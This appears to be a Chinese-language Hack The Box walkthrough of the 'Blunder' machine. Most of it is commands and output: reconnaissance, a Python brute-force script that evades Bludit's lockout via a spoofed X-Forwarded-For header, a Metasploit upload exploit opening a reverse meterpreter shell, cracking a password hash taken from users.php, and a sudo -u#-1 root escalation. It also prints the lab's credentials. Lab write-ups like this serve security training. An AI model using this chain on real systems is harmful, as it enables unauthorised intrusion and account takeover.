HTB-[blunder]

0x01.概述

0x01.信息收集

仅仅开放了21（关闭）/80端口

root@JIYE:~/htb/blunder# nmap -sC -sV -sT 10.10.10.191 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-18 08:32 EDT
Nmap scan report for 10.10.10.191
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.98 seconds
root@JIYE:~/htb/blunder#

0x01.先访问80端口

手动爬虫无果

0x03.扫描隐藏目录

root@JIYE:~/htb/blunder# gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,php,py,cgi
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.191
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     cgi,txt,php,py
[+] Timeout:        10s
===============================================================
2020/09/18 20:46:19 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.py (Status: 403)
/.hta.cgi (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.py (Status: 403)
/.htaccess.cgi (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.cgi (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.py (Status: 403)
/0 (Status: 200)
/about (Status: 200)
/admin (Status: 301)
[ERROR] 2020/09/18 20:49:18 [!] net/http: request canceled (Client.Timeout exceeded while reading body)
[ERROR] 2020/09/18 20:49:18 [!] Get http://10.10.10.191/AT-admin.cgi.py: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/at.py: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attach.py: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attachs: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/atom.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attach_mod.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attachment.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attic: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attachments.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/cgi-bin/ (Status: 301)
/install.php (Status: 200)
/LICENSE (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/todo.txt (Status: 200)
===============================================================
2020/09/18 21:13:55 Finished
===============================================================
root@JIYE:~/htb/blunder#

0x04.浏览隐藏文件

感觉fergus应该是一个用户

0x05.访问admin

发现为BLUDIT CMS

0x06.生成特定字典

root@JIYE:~/htb/blunder# cewl -w wordlist.txt -d 10 -m 7 http://10.10.10.191
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@JIYE:~/htb/blunder# wc -l wordlist.txt 
142 wordlist.txt
root@JIYE:~/htb/blunder#

0x07.爆破

brute源码

root@JIYE:~/htb/blunder# cat pass.py 
#!/usr/bin/python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
filename = '/root/htb/blunder/wordlist.txt'

# create a list ('wordlist') using the readlines method
with open(filename, 'r', encoding='8859') as f:
    wordlist = f.readlines()
    for i in range(len(wordlist)):
        wordlist[i] = wordlist[i].rstrip('\n')


# Generate 50 incorrect passwords (not necessary. probably.)
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))
  #  print(wordlist)

# Add the correct password to the end of the list (not really necessary in our use case)
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
root@JIYE:~/htb/blunder#

爆破成功：

user：fergus

password：RolandDeschain

root@JIYE:~/htb/blunder# python3 pass.py 
[*] Trying: Plugins
[*] Trying: Include
[*] Trying: service
[*] Trying: Dynamic
[*] Trying: blunder
[*] Trying: interesting
[*] Trying: devices
[*] Trying: content
[*] Trying: created
[*] Trying: Creation
[*] Trying: November
[*] Trying: Reading
[*] Trying: Fantasy
[*] Trying: National
[*] Trying: players
[*] Trying: description
[*] Trying: Favicon
[*] Trying: Bootstrap
[*] Trying: bootstrap
[*] Trying: Networks
[*] Trying: Content
[*] Trying: Stephen
[*] Trying: Sidebar
[*] Trying: nothing
[*] Trying: Copyright
[*] Trying: Powered
[*] Trying: byEgotisticalSW
[*] Trying: Javascript
[*] Trying: American
[*] Trying: fiction
[*] Trying: feature
[*] Trying: published
[*] Trying: received
[*] Trying: awarded
[*] Trying: literature
[*] Trying: centers
[*] Trying: through
[*] Trying: smartphones
[*] Trying: tablets
[*] Trying: library
[*] Trying: Breaked
[*] Trying: September
[*] Trying: supernatural
[*] Trying: suspense
[*] Trying: fantasy
[*] Trying: million
[*] Trying: adapted
[*] Trying: miniseries
[*] Trying: television
[*] Trying: including
[*] Trying: Richard
[*] Trying: Bachman
[*] Trying: written
[*] Trying: approximately
[*] Trying: stories
[*] Trying: collections
[*] Trying: British
[*] Trying: Society
[*] Trying: Foundation
[*] Trying: Distinguished
[*] Trying: Contribution
[*] Trying: Letters
[*] Trying: probably
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

0x08.登入

只能添加静态页面，没有什么有用信息

0x09.MSF反弹shell

msf5 > search bludit

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/linux/http/bludit_upload_images_exec  2019-09-07       excellent  Yes    Bludit Directory Traversal Image File Upload Vulnerability


msf5 > use exploit/linux/http/bludit_upload_images_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > use exploit/linux/http/bludit_upload_images_exec
[*] Using configured payload php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > options 

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.87.24.78      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2

msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => gergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.17.216
lhost => 10.10.17.216
msf5 exploit(linux/http/bludit_upload_images_exec) > options 

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS  RolandDeschain   yes       The password for Bludit
   BLUDITUSER  fergus           yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      10.10.10.191     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.17.216     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2


msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.17.216:4444 
[-] Exploit aborted due to failure: no-access: Authentication failed
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.17.216:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ELlQyVUzyq.png...
[*] Uploading .htaccess...
[*] Executing ELlQyVUzyq.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.17.216:4444 -> 10.10.10.191:50490) at 2020-09-18 22:16:21 -0400
[+] Deleted .htaccess

meterpreter > id
[-] Unknown command: id.
meterpreter > whoami
[-] Unknown command: whoami.

www用户没有权限

meterpreter > shell
Process 3590 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ 

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cd /home
cd /home
www-data@blunder:/home$ ls
ls
hugo  shaun
www-data@blunder:/home$ cd hugo
cd hugo
www-data@blunder:/home/hugo$ ls
ls
Desktop    Downloads  Pictures  Templates  user.txt
Documents  Music      Public    Videos
www-data@blunder:/home/hugo$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@blunder:/home/hugo$ cd ..
cd ..
www-data@blunder:/home$ ls
ls
hugo  shaun
www-data@blunder:/home$ cd shaun
cd shaun
www-data@blunder:/home/shaun$ ls
ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
www-data@blunder:/home/shaun$

下面查找bludit配置文件，寻找用户hash密码

www-data@blunder:/home/shaun$ cd /var/www/
cd /var/www/
www-data@blunder:/var/www$ ls
ls
bludit-3.10.0a  bludit-3.9.2  html
www-data@blunder:/var/www$ cd bbludit-3.10.0a^[[D
cd bbludit-3.10.0a
bash: cd: bbludit-3.10.0a: No such file or directory
www-data@blunder:/var/www$ cd bludit-3.10.0a
cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
ls
LICENSE    bl-content  bl-languages  bl-themes  install.php
README.md  bl-kernel   bl-plugins    index.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
ls
databases  pages  tmp  uploads  workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
ls
categories.php  plugins       site.php    tags.php
pages.php       security.php  syslog.php  users.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$`

解码地址

hash值：faca404fd5c0a31cf1897b823c695c85cffeb98d

用户：Hugo

解码：Password120

0x010.提权

Hugo登入

hugo  shaun
www-data@blunder:/home$ su hugo
su hugo
Password: Password120

hugo@blunder:/home$ whoami
whoami
hugo
hugo@blunder:/home$ ls
ls
hugo  shaun
hugo@blunder:/home$ cd
cd
hugo@blunder:~$ ls
ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
***************************
hugo@blunder:~$ 

利用/bin/bash提权

hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# whoami
whoami
root
root@blunder:/home/hugo# cd
cd
root@blunder:/# ls
ls
bin    dev  home   lib64       media  proc  sbin  sys  var
boot   etc  lib    libx32      mnt    root  snap  tmp
cdrom  ftp  lib32  lost+found  opt    run   srv   usr
root@blunder:/# cd root
cd root
root@blunder:/root# ls
ls
root.txt
root@blunder:/root# cat root.txt
cat root.txt
*************************************
root@blunder:/root#